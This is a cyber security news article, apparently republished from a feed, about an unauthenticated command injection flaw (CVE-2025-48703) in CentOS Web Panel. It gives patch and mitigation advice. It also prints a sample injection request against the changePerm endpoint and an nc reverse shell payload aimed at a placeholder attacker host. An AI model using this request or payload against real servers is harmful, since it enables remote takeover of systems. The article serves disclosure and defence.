Categories: Cyber Security News

Linux CentOS Web Panel Flaw Lets Attackers Execute Malicious Remote Code – PoC Released

A severe security flaw (CVE-2025-48703) in CentOS Web Panel (CWP) enables unauthenticated attackers to execute arbitrary commands on affected servers.

This vulnerability impacts CWP versions 0.9.8.1204 and 0.9.8.1188 on CentOS 7 systems, potentially compromising hundreds of thousands of servers globally.

The vulnerability combines an authentication bypass with command injection in the file permission change function.

Technical Exploit Mechanism

The exploit chain begins with an authentication bypass in CWP’s user interface (port 2083).

Attackers can send malicious requests to the file manager endpoint without valid session cookies by restructuring the URL path:

textPOST /myuser/index.php?module=filemanager&acc=changePerm HTTP/1.1
Host: target-server:2083
[...]
fileName=.bashrc&currentPath=/home/user/&t_total=$(malicious_command)

The critical vulnerability resides in the t_total parameter, which passes unsanitized input directly to the chmod system command.

This allows command injection through shell metacharacters like backticks or $(). For example, injecting `nc attacker-ip 9999 -e /bin/bash` opens a reverse shell to the attacker’s server.

Attack Execution and Impact

Successful exploitation requires knowing a valid non-root username on the target system, which attackers can enumerate through Shodan searches (Server: cwpsrv).

Once exploited, attackers gain full command execution as the compromised user.

Proof-of-concept output shows complete shell access:

bash$ nc -vlp 9999
Connection received from [victim-ip]
id
uid=1001(user) gid=1001(user) groups=1001(user)

This vulnerability is particularly dangerous because CWP’s ionCube-protected source code hinders independent security audits.

With over 200,000 CWP instances exposed online, widespread server takeovers are possible.

Mitigation and Patch Status

CWP developers released a patch in version 0.9.8.1205 (June 2025).

]Administrators must immediately:

  1. Upgrade CWP using the built-in updater
  2. Audit system users and remove unnecessary accounts
  3. Restrict firewall access to ports 2083/2087
    The vulnerability timeline shows disclosure on May 13, 2025, with CVE assignment on May 23 and patch release in June. Organizations should prioritize patching given the low attack complexity and high impact of unauthenticated RCE.

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates

The post Linux CentOS Web Panel Flaw Lets Attackers Execute Malicious Remote Code – PoC Released appeared first on Cyber Security News.

rssfeeds-admin

Recent Posts

Battlefield 6 Fans Believe BF Studios Is Teasing a Las Vegas Map

Battlefield 6 players think they’ve discovered that one of the three maps coming in Season…

4 minutes ago

Dragon Ball Super: Beerus Trailer Teases the Resurrection of Frieza

A new trailer for Dragon Ball Super: Beerus has arrived, teasing a look at not…

3 hours ago

Dragon Ball Xenoverse 3 Announced for PC and Consoles in First Trailer

Bandai Namco has announced Dragon Ball Xenoverse 3 for PC via Steam, PlayStation 5, and…

4 hours ago

Tammy Fogle outlines vision for Abilene City Council Place 4 race

ABILENE, Texas (KTAB/KRBC) – Abilene City Council Place 4 candidate Tammy Fogle is sharing her…

5 hours ago

The Best Deals Today: Apple AirTag 4-Pack, 3 for $33 Movie Deal, Sony WH-1000XM5 Headphones, and More

A new weekend has arrived, and today, you can save big on Apple AirTags, 4K…

6 hours ago

Avengers: Endgame Re-Release Footage is ‘Critical’ to the Plot of Doomsday

Director Joe Russo has confirmed the upcoming Avengers: Endgame re-release will include new footage that…

7 hours ago

This website uses cookies.